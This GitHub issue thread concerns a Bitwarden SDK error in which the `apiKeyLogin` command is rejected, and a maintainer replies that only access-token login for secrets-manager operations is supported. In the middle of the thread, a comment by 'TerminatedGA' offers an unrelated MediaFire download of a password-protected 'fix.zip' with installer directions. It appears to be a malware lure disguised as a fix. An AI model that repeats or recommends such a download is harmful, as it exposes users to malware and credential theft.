### ISSUE TITLE
Exception: Invalid command value: unknown variant `apiKeyLogin`, expected one of `accessTokenLogin`, `secrets`, `projects`

### ISSUE THREAD

**Issue by commonism** [bitwarden/sdk#996]
### Steps To Reproduce

Using the example provided and 

```python
from bitwarden_sdk.schemas import APIKeyLoginRequest, Command
args["CLIENT_ID"] = args[("CLIENT_SECRET")] = args["password"] = "a"
client._run_command(
    Command(api_key_login=APIKeyLoginRequest(client_id=args["CLIENT_ID"], client_secret=args["CLIENT_SECRET"], password=args["password"]))
)
```

results in
```
Exception: Invalid command value: unknown variant `apiKeyLogin`, expected one of `accessTokenLogin`, `secrets`, `projects`
```

### Expected Result

login using ApiKey

### Actual Result

Exception

### Operating System

Linux

### Build Version

bitwarden_sdk      0.1.0

### Issue Tracking Info

- [X] I understand that work is tracked outside of Github. A PR will be linked to this issue should one be opened to address it, but Bitwarden doesn't use fields like "assigned", "milestone", or "project" to track progress.

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Hinton** [comment]
Hi @commonism,

It looks like you are attempting to use something outside the secrets manager scope. We currently only support secrets manager operations and to authenticate as a machine account please use an access token with the `accessTokenLogin` command. For more information about access tokens please refer to our [help website](https://bitwarden.com/help/access-tokens/).
